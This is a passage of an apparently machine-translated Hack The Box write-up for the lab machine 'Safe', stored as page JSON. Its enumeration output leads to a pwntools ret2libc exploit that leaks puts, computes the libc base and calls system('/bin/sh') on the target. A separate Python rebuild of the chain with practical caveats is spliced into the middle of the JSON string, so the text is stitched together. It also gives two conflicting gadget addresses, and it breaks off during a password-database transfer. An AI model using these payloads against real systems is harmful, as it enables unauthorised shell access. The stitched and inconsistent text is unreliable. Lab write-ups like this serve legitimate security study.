{"componentChunkName":"component---src-templates-post-template-js","path":"/hackthebox-linux-safe-en","result":{"data":{"markdownRemark":{"id":"ba79305f-9a57-52b7-8a3d-4ee7d53cbc2d","html":"<blockquote>\n<p>This page has been machine-translated from the <a href=\"/hackthebox-linux-safe\">original page</a>.</p>\n</blockquote>\n<p>I am studying security using “Hack The Box,” a penetration testing learning platform.\nMy Hack The Box rank at the time of writing is ProHacker.</p>\n<p><img src=\"/static/f406dee62927ba52f8b404d46ba22624/c8042/327080.png\" alt=\"Hack The Box\" title=\"Hack The Box\"></p>\n<p>This is a writeup for the retired HackTheBox machine “Safe.”</p>\n<h2 id=\"about-this-article\" style=\"position:relative;\">About This Article</h2>\n<p><strong>The content of this article is not intended to promote acts that violate social order.</strong></p>\n<p>Please be aware in advance that attempting to attack environments other than your own or environments for which you have permission may violate the “Act on Prohibition of Unauthorized Computer Access” (Unauthorized Access Prohibition Act).</p>\n<p>All opinions expressed are my own and do not represent those of any organization I belong to.</p>\n<h2 id=\"table-of-contents\" style=\"position:relative;\">Table of Contents</h2>\n<ul>\n<li>\n<p><a href=\"#enumeration\">Enumeration</a></p>\n<ul>\n<li><a href=\"#exploiting-bof-to-get-a-shell\">Exploiting BOF to Get a Shell</a></li>\n</ul>\n</li>\n<li><a href=\"#internal-enumeration\">Internal Enumeration</a></li>\n<li><a href=\"#summary\">Summary</a></li>\n</ul>\n<h2 id=\"enumeration\" style=\"position:relative;\">Enumeration</h2>\n<p>Running an Nmap scan reveals that HTTP and SSH are open.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">Nmap scan report <span class=\"token keyword\">for</span> <span class=\"token variable\">$RHOST</span> <span class=\"token punctuation\">(</span><span class=\"token number\">10.10</span>.10.147<span class=\"token punctuation\">)</span>\nHost is up <span class=\"token punctuation\">(</span><span class=\"token number\">0</span>.24s latency<span class=\"token punctuation\">)</span>.\nNot shown: <span class=\"token number\">998</span> closed tcp ports <span class=\"token punctuation\">(</span>conn-refused<span class=\"token punctuation\">)</span>\nPORT   STATE SERVICE VERSION\n<span class=\"token number\">22</span>/tcp <span class=\"token function\">open</span>  <span class=\"token function\">ssh</span>     OpenSSH <span class=\"token number\">7</span>.4p1 Debian <span class=\"token number\">10</span>+deb9u6 <span class=\"token punctuation\">(</span>protocol <span class=\"token number\">2.0</span><span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span> ssh-hostkey: \n<span class=\"token operator\">|</span>   <span class=\"token number\">2048</span> 6d:7c:81:3d:6a:3d:f9:5f:2e:1f:6a:97:e5:00:ba:de <span class=\"token punctuation\">(</span>RSA<span 
class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>   <span class=\"token number\">256</span> <span class=\"token number\">99</span>:7e:1e:22:76:72:da:3c:c9:61:7d:74:d7:80:33:d2 <span class=\"token punctuation\">(</span>ECDSA<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>_  <span class=\"token number\">256</span> 6a:6b:c3:8e:4b:28:f7:60:85:b1:62:ff:54:bc:d8:d6 <span class=\"token punctuation\">(</span>ED25519<span class=\"token punctuation\">)</span>\n<span class=\"token number\">80</span>/tcp <span class=\"token function\">open</span>  http    Apache httpd <span class=\"token number\">2.4</span>.25 <span class=\"token variable\"><span class=\"token punctuation\">((</span>Debian<span class=\"token punctuation\">))</span></span>\n<span class=\"token operator\">|</span>_http-server-header: Apache/2.4.25 <span class=\"token punctuation\">(</span>Debian<span class=\"token punctuation\">)</span>\n<span class=\"token operator\">|</span>_http-title: Apache2 Debian Default Page: It works\nService Info: OS: Linux<span class=\"token punctuation\">;</span> CPE: cpe:/o:linux:linux_kernel\n\nService detection performed. 
Please report any incorrect results at https://nmap.org/submit/ <span class=\"token builtin class-name\">.</span>\nNmap done: <span class=\"token number\">1</span> IP address <span class=\"token punctuation\">(</span><span class=\"token number\">1</span> <span class=\"token function\">host</span> up<span class=\"token punctuation\">)</span> scanned <span class=\"token keyword\">in</span> <span class=\"token number\">34.89</span> seconds</code></pre></div>\n<p>The gobuster output wasn’t very useful.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">gobuster <span class=\"token function\">dir</span> -u http://<span class=\"token variable\">$RHOST</span>/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -k -t <span class=\"token number\">40</span> <span class=\"token operator\">|</span> <span class=\"token function\">tee</span> gobuster.txt\n\n<span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token 
operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">=</span>\n<span class=\"token number\">2022</span>/06/12 01:36:47 Starting gobuster <span class=\"token keyword\">in</span> directory enumeration mode\n<span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">=</span>\n/manual               <span class=\"token punctuation\">(</span>Status: <span class=\"token number\">301</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">[</span>Size: <span class=\"token number\">317</span><span class=\"token punctuation\">]</span> <span class=\"token punctuation\">[</span>--<span class=\"token 
operator\">></span> http://<span class=\"token variable\">$RHOST</span>/manual/<span class=\"token punctuation\">]</span>\n/server-status        <span class=\"token punctuation\">(</span>Status: <span class=\"token number\">403</span><span class=\"token punctuation\">)</span> <span class=\"token punctuation\">[</span>Size: <span class=\"token number\">302</span><span class=\"token punctuation\">]</span> \n<span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">==</span><span class=\"token operator\">=</span></code></pre></div>\n<p>There might be a domain restriction, but since I don’t know at this point, I’ll change approach and look for Apache vulnerabilities.</p>\n<p>I was stuck, so I also tried scanning all ports and found that port 1337 is open.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre 
class=\"language-bash\"><code class=\"language-bash\">nmap -p- <span class=\"token variable\">$RHOST</span> -Pn -sC -sV -A  <span class=\"token operator\">|</span> <span class=\"token function\">tee</span> nmap_max.txt\n<span class=\"token number\">1337</span>/tcp <span class=\"token function\">open</span>  waste?\n<span class=\"token operator\">|</span> fingerprint-strings: \n<span class=\"token operator\">|</span>   DNSStatusRequestTCP: \n<span class=\"token operator\">|</span>     05:43:45 up <span class=\"token number\">2</span>:04, <span class=\"token number\">0</span> users, load average: <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>\n<span class=\"token operator\">|</span>   DNSVersionBindReqTCP: \n<span class=\"token operator\">|</span>     05:43:39 up <span class=\"token number\">2</span>:04, <span class=\"token number\">0</span> users, load average: <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>\n<span class=\"token operator\">|</span>   GenericLines: \n<span class=\"token operator\">|</span>     05:43:26 up <span class=\"token number\">2</span>:04, <span class=\"token number\">0</span> users, load average: <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>\n<span class=\"token operator\">|</span>     What <span class=\"token keyword\">do</span> you want me to <span class=\"token builtin class-name\">echo</span> back?\n<span class=\"token operator\">|</span>   GetRequest: \n<span class=\"token operator\">|</span>     05:43:33 up <span class=\"token number\">2</span>:04, <span class=\"token number\">0</span> users, load average: <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>\n<span class=\"token operator\">|</span>     What <span class=\"token 
keyword\">do</span> you want me to <span class=\"token builtin class-name\">echo</span> back? GET / HTTP/1.0\n<span class=\"token operator\">|</span>   HTTPOptions: \n<span class=\"token operator\">|</span>     05:43:33 up <span class=\"token number\">2</span>:04, <span class=\"token number\">0</span> users, load average: <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>\n<span class=\"token operator\">|</span>     What <span class=\"token keyword\">do</span> you want me to <span class=\"token builtin class-name\">echo</span> back? OPTIONS / HTTP/1.0\n<span class=\"token operator\">|</span>   Help: \n<span class=\"token operator\">|</span>     05:43:50 up <span class=\"token number\">2</span>:04, <span class=\"token number\">0</span> users, load average: <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>\n<span class=\"token operator\">|</span>     What <span class=\"token keyword\">do</span> you want me to <span class=\"token builtin class-name\">echo</span> back? 
HELP\n<span class=\"token operator\">|</span>   NULL: \n<span class=\"token operator\">|</span>     05:43:26 up <span class=\"token number\">2</span>:04, <span class=\"token number\">0</span> users, load average: <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>\n<span class=\"token operator\">|</span>   RPCCheck: \n<span class=\"token operator\">|</span>     05:43:34 up <span class=\"token number\">2</span>:04, <span class=\"token number\">0</span> users, load average: <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>\n<span class=\"token operator\">|</span>   RTSPRequest: \n<span class=\"token operator\">|</span>     05:43:34 up <span class=\"token number\">2</span>:04, <span class=\"token number\">0</span> users, load average: <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>\n<span class=\"token operator\">|</span>     What <span class=\"token keyword\">do</span> you want me to <span class=\"token builtin class-name\">echo</span> back? 
OPTIONS / RTSP/1.0\n<span class=\"token operator\">|</span>   SSLSessionReq: \n<span class=\"token operator\">|</span>     05:43:50 up <span class=\"token number\">2</span>:04, <span class=\"token number\">0</span> users, load average: <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>\n<span class=\"token operator\">|</span>     What <span class=\"token keyword\">do</span> you want me to <span class=\"token builtin class-name\">echo</span> back?\n<span class=\"token operator\">|</span>   TLSSessionReq, TerminalServerCookie: \n<span class=\"token operator\">|</span>     05:43:51 up <span class=\"token number\">2</span>:04, <span class=\"token number\">0</span> users, load average: <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>, <span class=\"token number\">0.00</span>\n<span class=\"token operator\">|</span>_    What <span class=\"token keyword\">do</span> you want me to <span class=\"token builtin class-name\">echo</span> back?</code></pre></div>\n<p>Port 1337 is running some unknown service; connecting to it with netcat returns <code class=\"language-text\">What do you want me to echo back?</code>.</p>\n<p><img src=\"/static/975a6e715e9ab9ed0672188c7275af84/a1253/image-20220612190508371.png\" alt=\"image-20220612190508371\" title=\"image-20220612190508371\"></p>\n<p>After experimenting, I noticed that inputting 120 bytes (including the newline) causes no response to be returned, indicating a buffer overflow (BOF) vulnerability.</p>\n<p><img src=\"/static/3cf0bd21e8489ce90605c69b3ce92526/76cea/image-20220612193635553.png\" alt=\"image-20220612193635553\" title=\"image-20220612193635553\"></p>\n<p>However, since there’s no response and I can’t identify the binary running in the background, I was stuck.</p>\n<p>I don’t have enough experience to exploit a BOF blindly.</p>\n<p>Assuming the machine wouldn’t make you do it blindly, I started looking for the binary. I found on the port 80 top page that a file called <code class=\"language-text\">myapp</code> was available for download.</p>\n<p><img src=\"/static/ee7891f9e13f11a3560695e1e2b60ff9/0ad97/image-20220612201908834.png\" alt=\"image-20220612201908834\" title=\"image-20220612201908834\"></p>\n<p>Decompiling the downloaded binary shows that it is quite simple.</p>\n<p>It appears to be a program that runs <code class=\"language-text\">uptime</code> on the server side and then echoes the user’s input back with <code class=\"language-text\">puts</code>.</p>\n<p><img src=\"/static/90af7737a33332fa7b5d65f6ebfa20c1/db910/image-20220612222939668.png\" alt=\"image-20220612222939668\" title=\"image-20220612222939668\"></p>\n<p>For a simple BOF like this, it seems I can just call <code class=\"language-text\">system</code> with the address of <code class=\"language-text\">/bin/sh</code>.</p>\n<h3 id=\"exploiting-bof-to-get-a-shell\" style=\"position:relative;\">Exploiting BOF to Get a Shell</h3>\n<p>I identify the PLT entry of the <code class=\"language-text\">system</code> function needed to get a shell.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ objdump -d -M intel -j .plt myapp\n0000000000401040 <span class=\"token operator\">&lt;</span>system@plt<span class=\"token operator\">></span>:\n  <span class=\"token number\">401040</span>:       ff <span class=\"token number\">25</span> da 2f 00 00       jmp    QWORD PTR <span class=\"token punctuation\">[</span>rip+0x2fda<span class=\"token punctuation\">]</span>        <span class=\"token comment\"># 404020 &lt;system@GLIBC_2.2.5></span>\n  <span class=\"token number\">401046</span>:       <span class=\"token number\">68</span> 01 00 00 00          push   0x1\n  40104b:       e9 d0 ff ff ff          jmp    <span class=\"token number\">401020</span> <span class=\"token operator\">&lt;</span>.plt<span class=\"token 
operator\">></span></code></pre></div>\n<p>gdb shows the same address.</p>\n<p>PIE appears to be disabled, so this address is fixed.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ info functions\nNon-debugging symbols:\n0x0000000000401040  system@plt\n\n$ checksec\nCANARY    <span class=\"token builtin class-name\">:</span> disabled\nFORTIFY   <span class=\"token builtin class-name\">:</span> disabled\nNX        <span class=\"token builtin class-name\">:</span> ENABLED\nPIE       <span class=\"token builtin class-name\">:</span> disabled\nRELRO     <span class=\"token builtin class-name\">:</span> Partial</code></pre></div>\n<p>For a simple BOF, the final goal is roughly this:</p>\n<ol>\n<li>Find a <code class=\"language-text\">pop rdi; ret</code> gadget</li>\n<li>Use the BOF to put “/bin/sh” on the stack after the saved rip</li>\n<li>Put the address of <code class=\"language-text\">system</code> in the next stack slot</li>\n</ol>\n<p>Let’s get started.</p>\n<p>Since the input buffer sits 112 bytes below RBP, feeding 120 bytes (112 plus 8 for the saved RBP) overwrites the saved rip and beyond.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ <span class=\"token assign-left variable\">p</span><span class=\"token operator\">=</span><span class=\"token variable\"><span class=\"token variable\">$(</span><span class=\"token function\">ps</span> -ef <span class=\"token operator\">|</span> <span class=\"token function\">grep</span> -v <span class=\"token function\">grep</span> <span class=\"token operator\">|</span> <span class=\"token function\">grep</span> myapp <span class=\"token operator\">|</span> <span class=\"token function\">awk</span> <span class=\"token string\">'{print $2}'</span><span class=\"token variable\">)</span></span><span class=\"token punctuation\">;</span> gdb -p <span class=\"token variable\">$p</span> -x gdbcmd.txt\nRDI: 0x7ffc120a2160 --<span class=\"token operator\">></span> 0x74736574 <span class=\"token punctuation\">(</span><span class=\"token string\">'test'</span><span class=\"token punctuation\">)</span>\nRBP: 0x7ffc120a21d0 --<span class=\"token operator\">></span> 0x0 </code></pre></div>\n<p>Using peda’s ropgadget, I found that <code class=\"language-text\">pop rdi; ret</code> exists at 0x401139.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre class=\"language-bash\"><code class=\"language-bash\">$ ROPgadget --binary myapp <span class=\"token operator\">|</span> <span class=\"token function\">grep</span> pop\n0x000000000040120b <span class=\"token builtin class-name\">:</span> pop rdi <span class=\"token punctuation\">;</span> ret\n0x0000000000401209 <span class=\"token builtin class-name\">:</span> pop rsi <span class=\"token punctuation\">;</span> pop r15 <span class=\"token punctuation\">;</span> ret</code></pre></div>\n<p>I got stuck a fair bit after this, but finally obtained the flag with the following steps:</p>\n<ol>\n<li>Use ret2libc to leak the address of <code class=\"language-text\">puts</code></li>\n<li>Use <a href=\"https://libc.blukat.me/?q=puts%3Af90&#x26;l=libc6_2.24-11%2Bdeb9u4_amd64\" target=\"_blank\" rel=\"nofollow noopener noreferrer\">libc database search</a> to identify the libc version</li>\n</ol>\n<p><img src=\"/static/e3525e600b2e2b192b71cc2f8f78d87a/d9199/image-20220714225205008.png\" alt=\"image-20220714225205008\" title=\"image-20220714225205008\"></p>\n<ol start=\"3\">\n<li>Compute the address of <code class=\"language-text\">/bin/sh</code> in libc from the leaked address using the relative offset, and call the system function via ROP</li>\n</ol>\n<p>The solver I used is below:</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\"><span class=\"token keyword\">from</span> pwn <span class=\"token keyword\">import</span> <span class=\"token operator\">*</span>\n\n<span class=\"token comment\"># Local</span>\np <span class=\"token operator\">=</span> 
process<span class=\"token punctuation\">(</span><span class=\"token string\">\"./myapp\"</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># Remote</span>\np <span class=\"token operator\">=</span> remote<span class=\"token punctuation\">(</span><span class=\"token string\">\"10.10.10.147\"</span><span class=\"token punctuation\">,</span> <span class=\"token number\">1337</span><span class=\"token punctuation\">)</span>\n\nelf <span class=\"token operator\">=</span> ELF<span class=\"token punctuation\">(</span><span class=\"token string\">\"./myapp\"</span><span class=\"token punctuation\">)</span>\nlibc <span class=\"token operator\">=</span> ELF<span class=\"token punctuation\">(</span><span class=\"token string\">\"/lib/x86_64-linux-gnu/libc.so.6\"</span><span class=\"token punctuation\">)</span>\ncontext<span class=\"token punctuation\">.</span>binary <span class=\"token operator\">=</span> elf\n\njunk <span class=\"token operator\">=</span> <span class=\"token string\">b\"\\x41\"</span><span class=\"token operator\">*</span><span class=\"token number\">120</span>\nmain <span class=\"token operator\">=</span> p64<span class=\"token punctuation\">(</span><span class=\"token number\">0x40115f</span><span class=\"token punctuation\">)</span>\nsystem <span class=\"token operator\">=</span> p64<span class=\"token punctuation\">(</span><span class=\"token number\">0x401040</span><span class=\"token punctuation\">)</span>\n\npop_rdi <span class=\"token operator\">=</span> p64<span class=\"token punctuation\">(</span><span class=\"token number\">0x40120b</span><span class=\"token punctuation\">)</span>\npop_rsi_r15 <span class=\"token operator\">=</span> p64<span class=\"token punctuation\">(</span><span class=\"token number\">0x401209</span><span class=\"token punctuation\">)</span>\n\npayload <span class=\"token operator\">=</span> <span class=\"token string\">b\"\"</span>\npayload <span class=\"token operator\">+=</span> <span 
class=\"token string\">b\"\\x41\"</span><span class=\"token operator\">*</span><span class=\"token number\">120</span>\npayload <span class=\"token operator\">+=</span> pop_rdi\npayload <span class=\"token operator\">+=</span> p64<span class=\"token punctuation\">(</span>elf<span class=\"token punctuation\">.</span>got<span class=\"token punctuation\">[</span><span class=\"token string\">\"puts\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span>\npayload <span class=\"token operator\">+=</span> p64<span class=\"token punctuation\">(</span>elf<span class=\"token punctuation\">.</span>plt<span class=\"token punctuation\">[</span><span class=\"token string\">\"system\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span>\npayload <span class=\"token operator\">+=</span> p64<span class=\"token punctuation\">(</span>elf<span class=\"token punctuation\">.</span>sym<span class=\"token punctuation\">[</span><span class=\"token string\">\"main\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>p<span class=\"token punctuation\">.</span>recvline<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\np<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\n\n<span class=\"token comment\"># a = p.recvline().rstrip()</span>\n<span class=\"token comment\"># print(a)</span>\n<span class=\"token comment\"># print(a[7:-11])</span>\n\nleak <span class=\"token operator\">=</span> u64<span class=\"token punctuation\">(</span>p<span class=\"token punctuation\">.</span>recvline<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">.</span>rstrip<span class=\"token 
punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">[</span><span class=\"token number\">7</span><span class=\"token punctuation\">:</span><span class=\"token operator\">-</span><span class=\"token number\">11</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">.</span>ljust<span class=\"token punctuation\">(</span><span class=\"token number\">8</span><span class=\"token punctuation\">,</span> <span class=\"token string\">b\"\\x00\"</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span>leak<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>leak<span class=\"token punctuation\">)</span>\n\nbase <span class=\"token operator\">=</span> leak <span class=\"token operator\">-</span> <span class=\"token number\">0x068f90</span>\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span><span class=\"token builtin\">hex</span><span class=\"token punctuation\">(</span>base<span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\n\npayload <span class=\"token operator\">=</span> <span class=\"token string\">b\"\"</span>\npayload <span class=\"token operator\">+=</span> <span class=\"token string\">b\"\\x41\"</span><span class=\"token operator\">*</span><span class=\"token number\">120</span>\npayload <span class=\"token operator\">+=</span> pop_rdi\n<span class=\"token comment\"># payload += p64(next(libc.search(b\"/bin/sh\\x00\")))</span>\n<span class=\"token comment\"># payload += p64(libc.sym[\"system\"])</span>\npayload <span class=\"token operator\">+=</span> p64<span class=\"token punctuation\">(</span>base<span 
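class=\"token operator\">+</span><span class=\"token number\">0x161c19</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>The two stages of that solver, rebuilt here as an added example that is not part of the original writeup and does not need pwntools: it packs the same chains (120 bytes of padding, <code class=\"language-text\">pop rdi; ret</code>, the argument, <code class=\"language-text\">system@plt</code>, and for stage one a return to <code class=\"language-text\">main</code>), parses the shell error that <code class=\"language-text\">system()</code> produces when it is handed the raw GOT bytes (what the <code class=\"language-text\">[7:-11]</code> slice above cuts out), and checks that the leak minus the <code class=\"language-text\">puts</code> offset is page-aligned before building stage two. The GOT address is a placeholder, since the page never prints <code class=\"language-text\">elf.got[\"puts\"]</code>; every other address is the one from the writeup, and the sample shell line is constructed.</p>

```python
# Added example, not the writeup's solver: the two-stage chain rebuilt without
# pwntools so the payload layout and the leak parsing can be checked offline.
# Values marked (page) are the ones printed in the writeup; PUTS_GOT is a
# placeholder because the page never prints elf.got['puts'].
PADDING = 120                 # 112 bytes to saved RBP + 8 bytes of saved RBP (page)
POP_RDI_RET = 0x40120b        # pop rdi ; ret (page)
SYSTEM_PLT = 0x401040         # system@plt (page)
MAIN = 0x40115f               # main: loop back for a second overflow (page)
PUTS_GOT = 0x404018           # ASSUMPTION: stand-in for elf.got['puts']
PUTS_LIBC_OFFSET = 0x068f90   # puts in libc6_2.24-11+deb9u4 (page)
BINSH_LIBC_OFFSET = 0x161c19  # '/bin/sh' string in that libc (page)


def p64(value):
    return value.to_bytes(8, 'little')


def u64(raw):
    # A pointer leaked through a C string arrives as at most 8 bytes:
    # the high zero bytes of a 0x7f... address end the string early.
    if len(raw) > 8:
        raise ValueError('pointer longer than 8 bytes')
    return int.from_bytes(raw.ljust(8, bytes(1)), 'little')


def leak_chain(got_entry=PUTS_GOT):
    # Stage 1: system(&GOT[puts]) and then return to main.
    return (b'A' * PADDING
            + p64(POP_RDI_RET) + p64(got_entry)
            + p64(SYSTEM_PLT)
            + p64(MAIN))


def parse_leak(line):
    # system() runs the raw GOT bytes as a command; sh answers
    # 'sh: 1: [bytes]: not found', so the pointer sits between a 7-byte
    # prefix and an 11-byte suffix (the solver's [7:-11] slice).
    prefix, suffix = b'sh: 1: ', b': not found'
    line = line.rstrip(bytes([13, 10]))
    if not (line.startswith(prefix) and line.endswith(suffix)):
        raise ValueError('unexpected shell output: %r' % line)
    return u64(line[len(prefix):-len(suffix)])


def plausible_libc_base(leaked_puts):
    # libc is mapped page-aligned, so an offset from the wrong libc build
    # almost always shows up as a misaligned base.
    return (leaked_puts - PUTS_LIBC_OFFSET) % 0x1000 == 0


def libc_base(leaked_puts):
    if not plausible_libc_base(leaked_puts):
        raise ValueError('leak minus puts offset is not page aligned: wrong libc?')
    return leaked_puts - PUTS_LIBC_OFFSET


def shell_chain(base):
    # Stage 2: system('/bin/sh') using the string that libc itself contains.
    return (b'A' * PADDING
            + p64(POP_RDI_RET) + p64(base + BINSH_LIBC_OFFSET)
            + p64(SYSTEM_PLT))


# Constructed sample of what sh prints when GOT[puts] holds 0x7f1234568f90
# (six significant bytes; the two high NUL bytes terminate the string).
SAMPLE_LEAK_LINE = (b'sh: 1: '
                    + bytes([0x90, 0x8f, 0x56, 0x34, 0x12, 0x7f])
                    + b': not found' + bytes([10]))

if __name__ == '__main__':
    leaked = parse_leak(SAMPLE_LEAK_LINE)
    base = libc_base(leaked)
    print('puts @ %#x, libc base %#x' % (leaked, base))
    print('stage 1: %d bytes, stage 2: %d bytes'
          % (len(leak_chain()), len(shell_chain(base))))
```

<p>Two caveats a practitioner will hit with this chain. If <code class=\"language-text\">system</code> crashes on a <code class=\"language-text\">movaps</code> instruction, rsp is not 16-byte aligned at the call; insert one extra <code class=\"language-text\">ret</code> gadget before <code class=\"language-text\">system@plt</code>. And leaking through a shell error only works while the pointer bytes contain no whitespace or shell metacharacters; calling <code class=\"language-text\">puts@plt</code> on the GOT entry instead prints the raw bytes directly and avoids the parsing.</p>\n<p>The solver continues from that line:</p>\n<div class=\"gatsby-highlight\" data-language=\"python\"><pre class=\"language-python\"><code class=\"language-python\">payload <span class=\"token operator\">+=</span> p64<span class=\"token punctuation\">(</span>base<span 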
class=\"token operator\">+</span><span class=\"token number\">0x161c19</span><span class=\"token punctuation\">)</span>\npayload <span class=\"token operator\">+=</span> p64<span class=\"token punctuation\">(</span>elf<span class=\"token punctuation\">.</span>plt<span class=\"token punctuation\">[</span><span class=\"token string\">\"system\"</span><span class=\"token punctuation\">]</span><span class=\"token punctuation\">)</span>\n\n<span class=\"token keyword\">print</span><span class=\"token punctuation\">(</span>p<span class=\"token punctuation\">.</span>recvline<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span><span class=\"token punctuation\">)</span>\np<span class=\"token punctuation\">.</span>sendline<span class=\"token punctuation\">(</span>payload<span class=\"token punctuation\">)</span>\np<span class=\"token punctuation\">.</span>interactive<span class=\"token punctuation\">(</span><span class=\"token punctuation\">)</span></code></pre></div>\n<p>This gave me the user flag.</p>\n<h2 id=\"internal-enumeration\" style=\"position:relative;\"><a href=\"#internal-enumeration\" aria-label=\"internal enumeration permalink\" class=\"anchor before\"><svg aria-hidden=\"true\" focusable=\"false\" height=\"16\" version=\"1.1\" viewBox=\"0 0 16 16\" width=\"16\"><path fill-rule=\"evenodd\" d=\"M4 9h1v1H4c-1.5 0-3-1.69-3-3.5S2.55 3 4 3h4c1.45 0 3 1.69 3 3.5 0 1.41-.91 2.72-2 3.25V8.59c.58-.45 1-1.27 1-2.09C10 5.22 8.98 4 8 4H4c-.98 0-2 1.22-2 2.5S3 9 4 9zm9-3h-1v1h1c1 0 2 1.22 2 2.5S13.98 12 13 12H9c-.98 0-2-1.22-2-2.5 0-.83.42-1.64 1-2.09V6.25c-1.09.53-2 1.84-2 3.25C6 11.31 7.55 13 9 13h4c1.45 0 3-1.69 3-3.5S14.5 6 13 6z\"></path></svg></a>Internal Enumeration</h2>\n<p>Looking at the home directory, there was a file called <code class=\"language-text\">MyPasswords.kdbx</code> that immediately caught my attention.</p>\n<p>I attempted to transfer the file for analysis.</p>\n<div class=\"gatsby-highlight\" data-language=\"bash\"><pre 
